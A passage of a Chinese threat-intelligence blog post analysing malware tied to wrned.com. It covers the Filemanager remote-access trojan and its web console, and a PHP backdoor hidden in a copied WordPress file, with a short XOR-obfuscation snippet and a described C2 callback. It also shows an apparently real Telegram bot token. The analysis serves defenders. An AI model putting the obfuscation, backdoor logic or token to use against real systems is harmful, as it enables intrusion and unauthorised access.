leaf=""><span class="code-snippet__section">1190043163:AAFtaUfpui9fqKoRnqOa5XvT6MHLcK1axiU</span></span></code><br/></pre></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">知道 Token 以及群组 ID 之后，我们通过 getChatAdministrators 接口发现这个群组的创建者为 0xWR，遗憾的是他的个人简介中并没有暴露更多信息。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5625" data-type="jpeg" data-w="800" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-imgfileid="100035019" src="https://wechat2rss.xlab.app/img-proxy/?k=91318ae4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FodcL3w4qOqibbcrXToeicpQYIgAvXPH9BZebBoIUB6yEWsHRrFDP9Gx5aIrhco1IBSMMLXfVaKBHnRk6yILNFAqhK09XibREYVQP6F30XBjeWo%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">5月4日，用户 xrill_y 使用第一个 token 向 Bot 发送了消息。Mr_rot13 迅速响应，在新样本中直接作废该 token 并启用了新 token。随后，xrill_y 似乎为了隐藏，将用户名改为 iudcbjrfv。根据现在的线索，我们无法确定 xrill_y 的真实身份，但倾向于认为他是一名安全研究人员。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.6777920410783055" data-type="jpeg" data-w="779" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-imgfileid="100035020" src="https://wechat2rss.xlab.app/img-proxy/?k=c8e2421e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FodcL3w4qOqicbXkYPpPf9JUeXyxHsLra4njCUStia4jfAqh4WFrVhoEtmFiaaxHyB423IBk2RgE6u0RfNOHPBRs18xOY0icCTDqZNQeRKGuEQMQ%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">Filemanager远控</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">Filemanager 后门是一个跨平台的远控木马，支持 Darwin、Linux、Windows 三大主流操作系统。本文以 Linux、AMD64 CPU 架构的样本为主要分析对象，它的基本信息如下所示：</span></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="apache"><code><span leaf=""><span class="code-snippet__attribute">MD5</span>: <span class="code-snippet__number">9305</span>b4ebbb4d39907cf36b62989a6af3</span></code><br/><code><span leaf=""><span class="code-snippet__attribute">MAGIC</span>: ELF <span class="code-snippet__number">64</span>-bit LSB executable, x86-<span class="code-snippet__number">64</span>, version <span class="code-snippet__number">1</span> (SYSV), statically linked, stripped</span></code><br/><code><span leaf=""><span class="code-snippet__attribute">Name</span>: filemanager-linux-amd64</span></code><br/></pre></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">Filemanager 支持大量参数，具体用法请参考帮助信息，本文不再逐一赘述。需特别注意的是，该工具不支持直接传递明文密码。正确的做法是：先用 -hash 参数对目标密码生成 bcrypt 哈希值，再将生成的哈希值通过 -pass-hash 参数传入。在 Shell 环境中，必须使用单引号将 bcrypt 哈希值括起来（例如 &#39;$2a$10$...&#39;），否则 $ 符号会被解释为变量，导致密码无效。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.54375" data-type="jpeg" data-w="800" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-imgfileid="100035021" src="https://wechat2rss.xlab.app/img-proxy/?k=0eecdcb0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FodcL3w4qOq8MEgONwxlgKeWiamXiaDlvqIzqqBvRQtWZD4ianYCT2KicicvIzAlhpmiaRibqh4icnULT5lnkypdricf6dSZfIllVaPJJlEQgYKvGUS30%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">Filemanager 运行时监听 port 参数指定的端口，通过 Web 页面为攻击者提供远程管理被入侵系统的通道。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.3916083916083916" data-type="jpeg" data-w="715" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-imgfileid="100035023" src="https://wechat2rss.xlab.app/img-proxy/?k=e03c6767&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FodcL3w4qOq89TKqpxxtuRWzjkOwv9WgTDOHJEWHxy4Bc52CFqZcl06CTdniarMnsKoe6iarvQ2q6phsrztwttyLVagBSx1c8HKxKL5CMVSOibc%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">为了演示它的功能，我们在测试设备中启动 filemanager，并指定用户名 &amp; 密码，端口为 9999。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.26875" data-type="jpeg" data-w="800" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-imgfileid="100035022" src="https://wechat2rss.xlab.app/img-proxy/?k=d6f3472e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FodcL3w4qOq94MOMfs9ggDQsTffnZe5icJ1sibJA9icicmEttds91rUcqmCRehLbDIicRrV7W2Nydta41TA4l7OAeiaia6hBia8xjpmb1wcqtEO0omjk%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">此时通过浏览器访问测试设备的 9999 端口，即可进入操作页面，非常典型的远控操作台，支持文件管理，远程命令执行以及 SHELL 功能。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.45875" data-type="jpeg" data-w="800" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-imgfileid="100035026" src="https://wechat2rss.xlab.app/img-proxy/?k=dd235a2d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FodcL3w4qOqibwJdCG9j4row24aibnALlt85j3buJ851MEl5qQ2vycoQTAvrC2TIfj9ib3liaQSGWjb26sf29uSzDllMSicbLMtp0A5uaZGOaJtW4%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">2022年至今0检测的PHP后门</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">在溯源过程中，我们发现了一个 2022 年上传到 VirusTotal、名为 helper 的 PHP 文件，该文件存在和 wrned.com 通信的行为，经过分析，我们确认它是一个 PHP 后门。</span></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="makefile"><code><span leaf=""><span class="code-snippet__section">MD5: 2286f126ab4740ccf2595ad1fa0c615c</span></span></code><br/><code><span leaf=""><span class="code-snippet__section">Magic: PHP script text</span></span></code><br/><code><span leaf=""><span class="code-snippet__section">Name: helper.php</span></span></code><br/></pre></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">该文件由 2 部分组成，前部分代码来自 WordPress 系统文件 options.php，从 &lt;/script&gt;*/ 之后为混淆的恶意代码。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.3923865300146413" data-type="jpeg" data-w="683" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-imgfileid="100035027" src="https://wechat2rss.xlab.app/img-proxy/?k=8dd29f4a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FodcL3w4qOq9KV5wUoXGQOInnia0ELdgL8Gpn9cavcLbZicWKsU8Nc2Y7dPLFjsSd0CUSXL31tS3HFQcI5kNujOldTSV3Ra36oCKzWdaNXzwF8%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">混淆方式为简单的字串 xor 拼接混淆，以下面的混淆字串为例，它去混淆后为 str_rot13：</span></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="bash"><code><span leaf=""><span class="code-snippet__variable">$___</span> = (<span class="code-snippet__string">&#34;8&#34;</span> ^ <span class="code-snippet__string">&#34;K&#34;</span>) .(<span class="code-snippet__string">&#34;8&#34;</span> ^ <span class="code-snippet__string">&#34;L&#34;</span>) .</span></code><br/><code><span leaf="">(<span class="code-snippet__string">&#34;8&#34;</span> ^ <span class="code-snippet__string">&#34;J&#34;</span>) .(<span class="code-snippet__string">&#34;v&#34;</span> ^ <span class="code-snippet__string">&#34;)&#34;</span>) .</span></code><br/><code><span leaf="">(<span class="code-snippet__string">&#34;8&#34;</span> ^ <span class="code-snippet__string">&#34;J&#34;</span>) .(<span class="code-snippet__string">&#34;T&#34;</span> ^ <span class="code-snippet__string">&#34;;&#34;</span>) .</span></code><br/><code><span leaf="">(<span class="code-snippet__string">&#34;8&#34;</span> ^ <span class="code-snippet__string">&#34;L&#34;</span>) .(<span class="code-snippet__string">&#34;W&#34;</span> ^ <span class="code-snippet__string">&#34;f&#34;</span>) .(<span class="code-snippet__string">&#34;R&#34;</span> ^ <span class="code-snippet__string">&#34;a&#34;</span>);</span></code><br/></pre></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">全文去混淆后不难看出 PHP 后门的主要逻辑为：首先向 C2 地址 <a href="https://wrned[.]com/api.php?t=3&amp;c=1" target="_blank">https://wrned[.]com/api.php?t=3&amp;c=1</a> 回传触发环境下的关键参数，包括 URL、客户端 IP、参数 w 的值及 User-Agent 等。C2 响应返回一个包含 s、u、c 三个键的 JSON 对象。其中，s 用于标识当前请求在 C2 视角下是否合法；c 为 RC4 密钥，用于解密硬编码的 payload；u 用于承载额外数据，我们推测它在解密后的 payload 执行阶段被引用。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.97875" data-type="jpeg" data-w="800" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-imgfileid="100035025" src="https://wechat2rss.xlab.app/img-proxy/?k=bf24471d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FodcL3w4qOqibfc3bAbJs9KAdj4czHmRT67mn6eFxkGbyjI6n4WKY9aMqc36qgSsbhibvPEreQIEJRQvwksCL6w3J6YrAbMwe9gHFF0Fa96GUc%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></p><p style="overflow-wrap: break-word;margin: 1.5em 